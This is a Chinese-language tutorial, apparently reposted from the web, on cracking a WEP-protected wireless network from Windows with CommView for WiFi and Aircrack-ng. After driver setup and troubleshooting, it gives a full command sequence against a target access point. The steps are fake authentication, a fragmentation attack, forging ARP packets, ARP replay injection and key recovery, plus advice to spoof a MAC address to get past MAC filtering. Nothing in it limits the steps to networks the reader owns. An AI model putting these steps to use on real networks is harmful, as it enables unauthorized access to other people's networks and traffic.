Aircrack-ng破解无线网络(基于Windows系统)

来源:互联网 发布:极致物业软件 编辑:程序博客网 时间:2024/05/17 22:33

首先你需要一个抓包工具,目前大多数相关文章都选用了Commview For Wifi 这个抓包工作。对于无线网络侦听有很强大的功能,并且还有中文语言包。不过我们在命令行下破解,至于其他功能大家可以自己研究。我们紧紧需要他的抓包驱动功能,以前也有过类似的程序wildpackets。但是现在很少用了,也有人用Beini(奶瓶)甚至大才小用的BackTrack5(确实有些浪费)。

首先看看Commview支持你的网卡不,Commview所支持的网卡http://www.tamos.com/products/commwifi/adapterlist.php  。 我有个朋友很倒霉,在Linux下他的网卡是内置的,就不支持。到了Windows下,本应良好支持的网卡又遇到了Commview这个关卡。至于不支持,可以考虑老程序下载widpackets的动:http://www.wildpackets.com/support/downloads/drivers

 

好,我们细说Commview用户

准备工作:

1、下载其驱动

http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca6.zip

2.下载Aircrack-ng所需与Commview结合的DLL文件http://darkircop.org/commview.dll

3、aircrack 压缩包:http://download.aircrack-ng.org/aircrack-ng-1.0-rc1-win.zip

4、把aircrack解压,并将Commview,dll拷贝到其目录下

去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).

开始破解:
1:打开一个命令提示符 (开始 > 运行 > cmd.exe)
2:在命令提示符窗口下面输入:
Cd c:\aircrack 
按下回车
3 在命令相同的提示符窗口下面输入: 
airserv-ng -d commview.dll
按下回车
你看到的回复应该跟下面一样:
Opening card commview.dll 
Setting chan 1 
Opening sock port 666 
Serving commview.dll chan 1 on port 666

如果你没有看到上面的结果的话,而是看到下面的结果的话:

注意这里可能会有两种情况出现!!!!!:

(1)
"Opening card commview.dll 
Adapter not found 
get_guid() 
airserv-ng: wi_open(): No error"
这种情况那么你可以试试这个命令:
airserv-ng -d "commview.dll|debug"
然后你可能会看到下面的结果

Opening card commview.dll|debug 
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co 
mboCard Gold - Paketplaner-Miniport 
Adapter not found 
get_guid() 
airserv-ng: wi_open(): No error

那么你只要输入下面的命令就可以了
airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

或者会自动搜寻网卡,然后提示你是不是这个网卡,然你选yes/no,那么你需要选择yes就可以了

(2)"Opening card commview.dll 
F1 
init_lib() 
airserv-ng: wi_open(): No error"

这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.


实例:
破解AP的ESSID = wifi16

破解AP的BSSID = 11:22:33:44:55:66

破解AP的CHANNEL=6

自己用于监听网卡的MAC = 01:23:45:67:89:01


1.首先监听AP

airodump-ng --channel 6 --write Filename 127.0.0.1:666


2.建立虚拟连接:

aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果一切正常的话那么你会得到下面的回复:
Sending Authentication Request 
Authentication successful 
Sending Association Request 
Association successful

如果你得到:
AP rejects the source MAC address
这说明你AP设置了MAC过滤,那你需要把你的MAC地址改成破解网络允许的地址.

如果你持续得到:
sending authentication request
那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.


3.利用-5碎片攻击模式进行攻击

aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果成功将会得到一个xor文件,例如文件为fragment-0124-161129.xor


4.利用packetforge-ng 构造一个用于注入的arp包

packetforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp


5.利用-2的arp注入攻击模式进行注入

aireplay-ng -2 -r myarp 127.0.0.1:666


6.利用aircrack来破解WP

aircrack-ng -n 64 Filename.cap

 

1 0